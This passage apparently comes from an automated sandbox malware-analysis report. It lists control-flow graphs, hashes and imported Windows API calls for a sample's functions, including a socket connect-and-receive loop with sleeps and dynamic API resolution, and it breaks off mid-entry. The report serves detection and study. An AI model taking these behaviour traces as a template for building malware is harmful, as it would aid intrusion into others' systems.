                                                                                                                                              control_flow_graph 1853 d32890-d328e1 1854 d328e3-d32904 call c681e0 1853->1854 1855 d32946-d3294c 1853->1855 1859 d32909 1854->1859 1857 d32970-d32976 1855->1857 1858 d3294e-d3296e call c73df0 1855->1858 1861 d32978-d32998 call c73df0 1857->1861 1862 d3299d-d329a3 1857->1862 1863 d3290c-d32915 1858->1863 1859->1863 1861->1863 1866 d329a5-d329a9 1862->1866 1867 d329cc-d329d2 1862->1867 1869 d330a4-d330b7 1863->1869 1870 d3291b-d32927 1863->1870 1866->1863 1868 d329af-d329c7 call c73df0 1866->1868 1871 d329f2-d329f8 1867->1871 1872 d329d4-d329ed call c9bb47 1867->1872 1868->1863 1875 d3309a-d330a1 call c8e183 1870->1875 1876 d3292d-d3293b 1870->1876 1878 d32a06-d32a0c 1871->1878 1879 d329fa-d32a01 1871->1879 1872->1863 1875->1869 1881 d32941 1876->1881 1882 d330b8 call c93500 1876->1882 1884 d32a12-d32a36 call c64b10 1878->1884 1885 d32f16-d32f1c 1878->1885 1879->1863 1881->1875 1892 d330bd-d33105 call c93500 setsockopt 1882->1892 1902 d32a40-d32a58 1884->1902 1888 d32f54-d32f5a 1885->1888 1889 d32f1e-d32f4f call c786a0 call c71960 1885->1889 1894 d32f92-d32f98 1888->1894 1895 d32f5c-d32f8d call c786a0 call c71960 1888->1895 1889->1863 1898 d32fd0-d32fd6 1894->1898 1899 d32f9a-d32fcb call c786a0 call c71960 1894->1899 1895->1863 1905 d32fd8-d33009 call c786a0 call c71960 1898->1905 1906 d3300e-d33014 1898->1906 1899->1863 1909 d32efe-d32f0b call c8d43a 1902->1909 1910 d32a5e-d32a90 1902->1910 1905->1863 1915 d33016-d33047 call c786a0 call c71960 1906->1915 1916 d3304c-d33052 1906->1916 1909->1863 1918 d32a93-d32a98 1910->1918 1915->1863 1916->1863 1922 d33058-d33083 call cb3390 call c73fa0 call c631c0 1916->1922 1918->1918 1920 d32a9a-d32b3c call c634e0 1918->1920 1936 d32b40-d32b45 1920->1936 1922->1863 1936->1936 1938 d32b47-d32ba8 call c7c4c0 1936->1938 1944 d32baa 1938->1944 1945 d32bac-d32bc6 call c79950 1938->1945 1944->1945 1948 d32bf7-d32c1f 1945->1948 1949 d32bc8-d32bd7 1945->1949 1950 d32c21-d32c30 1948->1950 1951 d32c50-d32c6f 1948->1951 1952 d32bd9-d32be7 1949->1952 1953 d32bed-d32bf4 call c8e183 1949->1953 1954 d32c32-d32c40 1950->1954 1955 d32c46-d32c4d call c8e183 1950->1955 1956 d32f10-d32f11 1951->1956 1957 d32c75-d32d52 call c632a0 call d42cc0 call c631c0 call c73b90 1951->1957 1952->1892 1952->1953 1953->1948 1954->1892 1954->1955 1955->1951 1956->1902 1970 d32d54-d32d77 call c74090 call d3b380 1957->1970 1971 d32d7c-d32e0a 1957->1971 1980 d32e4d-d32e62 1970->1980 1972 d32e0e-d32e1f call c940b0 1971->1972 1973 d32e0c 1971->1973 1979 d32e21-d32e3f call c9beb8 1972->1979 1972->1980 1973->1972 1990 d32e44-d32e4a call c97938 1979->1990 1981 d32ea6-d32eac 1980->1981 1982 d32e64-d32e66 1980->1982 1988 d32eda-d32ef9 call c631c0 1981->1988 1989 d32eae-d32eb8 1981->1989 1985 d32e93-d32e9e 1982->1985 1986 d32e68-d32e90 call c631c0 1982->1986 1985->1982 1993 d32ea0 1985->1993 1986->1985 1988->1909 1994 d32ed0-d32ed7 call c8e183 1989->1994 1995 d32eba-d32ec8 1989->1995 1990->1980 1993->1981 1994->1988 1995->1892 1999 d32ece 1995->1999 1999->1994
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e0581c6d35935c47c567eaa35f268c9253f9207795503609650a65e3987eb85
                                                                                                                                              • Instruction ID: f26a57f1714460cd942f49e166867c590869e5a3dfc569d611b312ca77f88847
                                                                                                                                              • Opcode Fuzzy Hash: 6e0581c6d35935c47c567eaa35f268c9253f9207795503609650a65e3987eb85
                                                                                                                                              • Instruction Fuzzy Hash: 8D32BF70D00248DFDB24DF68C9857ECBBB1EF54304F148199E849AB392DB709A84DFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C9A8BD Relevance: .3, Instructions: 318COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e049d02d182e6ed60b20a539b0ef182e1b457fd3cfd3172ae4c3ee43cd0cfadf
                                                                                                                                              • Instruction ID: 90eb181d6f11f23234b267dddcf563cab7a936b6d9018a042ff9cae319b59564
                                                                                                                                              • Opcode Fuzzy Hash: e049d02d182e6ed60b20a539b0ef182e1b457fd3cfd3172ae4c3ee43cd0cfadf
                                                                                                                                              • Instruction Fuzzy Hash: 83B1D13090060A9BCF28CE69D69D6BEB7B1FF04304F15061DD9A297691DB31AF41DBD2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D323C0 Relevance: 18.4, APIs: 12, Instructions: 351networksleepCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 609 d323c0-d323f8 610 d32870-d32884 609->610 611 d323fe 609->611 612 d32404-d3240c 611->612 613 d32447-d32490 setsockopt recv WSAGetLastError 612->613 614 d3240e-d32434 call d33150 612->614 613->610 616 d32496-d32499 613->616 617 d32439-d32441 614->617 618 d327da-d32804 call c8d8f9 call cb2ef0 616->618 619 d3249f-d324a6 616->619 617->613 620 d3285b-d3286a Sleep 617->620 624 d3284d-d32855 Sleep 618->624 632 d32806 618->632 622 d327c8-d327d8 recv 619->622 623 d324ac-d324f3 call c76930 recv 619->623 620->610 620->612 622->624 630 d32784-d32791 623->630 631 d324f9-d32514 recv 623->631 624->620 630->624 634 d32797-d327a3 630->634 631->630 633 d3251a-d32551 631->633 635 d32810-d32837 call c681e0 632->635 636 d32808-d3280e 632->636 637 d32553-d325b1 call c76930 setsockopt recv 633->637 638 d325b4-d325e4 call c74090 633->638 639 d327a5-d327b3 634->639 640 d327b9-d327c3 call c8e183 634->640 647 d3283c-d32848 635->647 636->624 636->635 637->638 651 d32704-d32741 call d32890 638->651 652 d325ea 638->652 639->640 644 d32885-d3288a call c93500 639->644 640->624 647->624 656 d32746-d32753 651->656 654 d325f0-d32608 652->654 657 d3261a-d32629 654->657 658 d3260a-d32615 654->658 656->630 659 d32755-d32764 656->659 661 d3262b-d32634 657->661 662 d32639-d32645 657->662 660 d326e9 658->660 663 d32766-d32774 659->663 664 d3277a-d32781 call c8e183 659->664 665 d326ec-d326fe 660->665 661->660 666 d32647-d32650 662->666 667 d32655-d32661 662->667 663->644 663->664 664->630 665->651 665->654 666->660 668 d32663-d3266c 667->668 669 d3266e-d3267a 667->669 668->660 671 d32687-d32693 669->671 672 d3267c-d32685 669->672 674 d326a0-d326ac 671->674 675 d32695-d3269e 671->675 672->660 676 d326b9-d326c5 674->676 677 d326ae-d326b7 674->677 675->660 678 d326d2-d326db 676->678 679 d326c7-d326d0 676->679 677->660 678->665 680 d326dd-d326e5 678->680 679->660 680->660
                                                                                                                                              APIs
                                                                                                                                              • setsockopt.WS2_32(000002F8,0000FFFF,00001006,?,00000008), ref: 00D32466
                                                                                                                                              • recv.WS2_32(?,00000004,00000002), ref: 00D32481
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00D32485
                                                                                                                                              • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 00D324EE
                                                                                                                                              • recv.WS2_32(00000000,0000000C,00000008), ref: 00D3250F
                                                                                                                                              • setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 00D3258B
                                                                                                                                              • recv.WS2_32(00000000,?,00000008), ref: 00D325AC
                                                                                                                                                • Part of subcall function 00D33150: WSAStartup.WS2_32 ref: 00D3317A
                                                                                                                                                • Part of subcall function 00D33150: socket.WS2_32(?,?,?), ref: 00D3321D
                                                                                                                                                • Part of subcall function 00D33150: connect.WS2_32(00000000,00DBF6D1,?), ref: 00D33231
                                                                                                                                                • Part of subcall function 00D33150: closesocket.WS2_32(00000000), ref: 00D3323D
                                                                                                                                                • Part of subcall function 00D33150: WSACleanup.WS2_32 ref: 00D33250
                                                                                                                                              • recv.WS2_32(?,00000004,00000008), ref: 00D327D6
                                                                                                                                              • __Xtime_get_ticks.LIBCPMT ref: 00D327DA
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D327E8
                                                                                                                                              • Sleep.KERNEL32(00000001,00000000,?,00002710,00000000), ref: 00D3284F
                                                                                                                                              • Sleep.KERNEL32(00000064,?,00002710,00000000), ref: 00D3285D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: recv$Sleepsetsockopt$CleanupErrorLastStartupUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@closesocketconnectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2144401278-0
                                                                                                                                              • Opcode ID: d5ff4141ef854f88a7e4c730b962eaf4e1688f41d1a93616bc4dca8c721d2da2
                                                                                                                                              • Instruction ID: b8d6be18ff6e586675f94be19149aa2cb2f25816ed2474987361ec5ea747a1d4
                                                                                                                                              • Opcode Fuzzy Hash: d5ff4141ef854f88a7e4c730b962eaf4e1688f41d1a93616bc4dca8c721d2da2
                                                                                                                                              • Instruction Fuzzy Hash: 22E1FE70D00384EBDB15DBA4CC95BBDBBF4AF46310F280259E481AB2D2DB705D89DBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D52CD0 Relevance: 9.3, APIs: 6, Instructions: 332libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 681 d52cd0-d52ce7 call c8d429 684 d52d4c-d52d4e call c8cdc4 681->684 685 d52ce9-d52cf3 681->685 688 d52d53-d52e0d call c8cdc4 call c940b0 684->688 687 d52cf5-d52cf7 685->687 685->688 689 d52d35 687->689 690 d52cf9-d52cfe 687->690 699 d52e12-d52e17 688->699 694 d52d37-d52d4b call c8d43a 689->694 692 d52d00-d52d05 690->692 692->692 695 d52d07-d52d09 692->695 695->689 698 d52d0b-d52d15 GetFileAttributesA 695->698 701 d52d17-d52d20 GetLastError 698->701 702 d52d31-d52d33 698->702 703 d52e19-d52e26 call c97938 699->703 704 d52e28 699->704 701->702 705 d52d22-d52d25 701->705 702->694 707 d52e2c-d52e32 703->707 704->707 705->702 708 d52d27-d52d2a 705->708 710 d52e34-d52e40 707->710 711 d52e5c-d52e65 707->711 708->702 712 d52d2c-d52d2f 708->712 713 d52e52-d52e59 call c8e183 710->713 714 d52e42-d52e50 710->714 712->689 712->702 713->711 714->713 715 d52e66-d52eca call c93500 714->715 720 d52ecc-d52edd 715->720 721 d52edf-d52ef0 call c7e890 715->721 722 d52ef3-d52ef6 720->722 721->722 725 d52f23-d52f34 722->725 726 d52ef8-d52f07 722->726 727 d52f19-d52f20 call c8e183 726->727 728 d52f09-d52f17 726->728 727->725 728->727 729 d52f35-d5305b call c93500 GetModuleHandleA GetProcAddress 728->729 734 d5305d-d53066 729->734 735 d53068-d5306e 729->735 737 d53075-d5307e 734->737 735->737 738 d53085-d5308c 737->738 739 d53080-d53083 737->739 741 d530b4-d530bc 738->741 742 d5308e-d53096 738->742 739->738 740 d53097-d5309a 739->740 740->742 743 d5309c-d530a5 740->743 743->741 744 d530a7-d530b3 743->744
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00CBF30E,?,00DBA5B3,000000FF), ref: 00D52D0C
                                                                                                                                              • GetLastError.KERNEL32(?,00DBA5B3,000000FF), ref: 00D52D17
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52D4E
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52D5F
                                                                                                                                              • GetModuleHandleA.KERNEL32(?), ref: 00D53048
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00D53053
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cpp_errorThrow_std::_$AddressAttributesErrorFileHandleLastModuleProc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1350367881-0
                                                                                                                                              • Opcode ID: 7d95fd2f0aee88894fa61e0c3d32004f818bf78f362604e2e67d341323042999
                                                                                                                                              • Instruction ID: 37a79998ba577db1534206aba6e417f3740e59db24e70ea31d737b2b59b35984
                                                                                                                                              • Opcode Fuzzy Hash: 7d95fd2f0aee88894fa61e0c3d32004f818bf78f362604e2e67d341323042999
                                                                                                                                              • Instruction Fuzzy Hash: 7AC19CB4D04209ABCF14CF98D8816EDFBB1FF49315F148699EC55A7340E730AA48DBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C7A800 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 378COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 745 c7a800-c7a840 746 c7a846-c7a864 745->746 747 c7aa68-c7aa89 call c81ed0 745->747 749 c7a866-c7a870 746->749 750 c7a873-c7a8ad call c7b670 call c80db0 call c7c660 746->750 752 c7aa8e-c7aa9c call c7c660 747->752 749->750 771 c7a8b3-c7a940 call c7b7b0 call c66670 call c7bd60 750->771 772 c7a9bd-c7a9c4 750->772 759 c7abb2-c7abb6 752->759 760 c7aaa2-c7ab2c call c7b7b0 call c66670 call c7bd60 752->760 763 c7ac3c-c7ac41 759->763 764 c7abbc-c7abf9 call c75ab0 call c71940 759->764 801 c7ab32-c7ab84 call c631c0 call c8f408 * 2 call c631c0 760->801 802 c7ac8e-c7aca2 call c76c30 call c8fc4b 760->802 767 c7ac27-c7ac39 763->767 768 c7ac43-c7ac53 763->768 764->767 792 c7abfb-c7ac0b 764->792 774 c7ac55-c7ac63 768->774 775 c7ac1d-c7ac24 call c8e183 768->775 796 c7ac6a-c7ac84 call c76c30 call c8fc4b 771->796 816 c7a946-c7a98f call c631c0 call c8f408 * 2 call c631c0 771->816 781 c7a9c6-c7a9cc 772->781 782 c7a9ce-c7a9d1 772->782 774->775 780 c7ac65 call c93500 774->780 775->767 780->796 783 c7a9dd-c7aa0a call c75ab0 call c71940 781->783 784 c7a9d3-c7a9db 782->784 785 c7aa0f-c7aa22 call c71940 782->785 783->785 784->783 808 c7aa24-c7aa38 785->808 809 c7aa42-c7aa63 call c71310 * 3 785->809 792->775 798 c7ac0d-c7ac1b 792->798 818 c7ac89 call c93500 796->818 798->775 798->780 801->759 845 c7ab86-c7ab92 801->845 825 c7aca7-c7acb9 call c93500 802->825 808->809 809->767 816->772 859 c7a991-c7a99d 816->859 818->802 838 c7ace3-c7acf6 825->838 839 c7acbb-c7acc5 825->839 842 c7acc7-c7acd5 839->842 843 c7acd9-c7acdb call c8e183 839->843 846 c7acf7-c7ad04 call c93500 842->846 847 c7acd7 842->847 849 c7ace0 843->849 852 c7ab94-c7aba2 845->852 853 c7aba8-c7abaf call c8e183 845->853 857 c7ad06-c7ad08 846->857 858 c7ad0c 846->858 847->843 849->838 852->825 852->853 853->759 857->858 861 c7a9b3-c7a9ba call c8e183 859->861 862 c7a99f-c7a9ad 859->862 861->772 862->818 862->861
                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7A959
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7A972
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7AB4E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7AB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
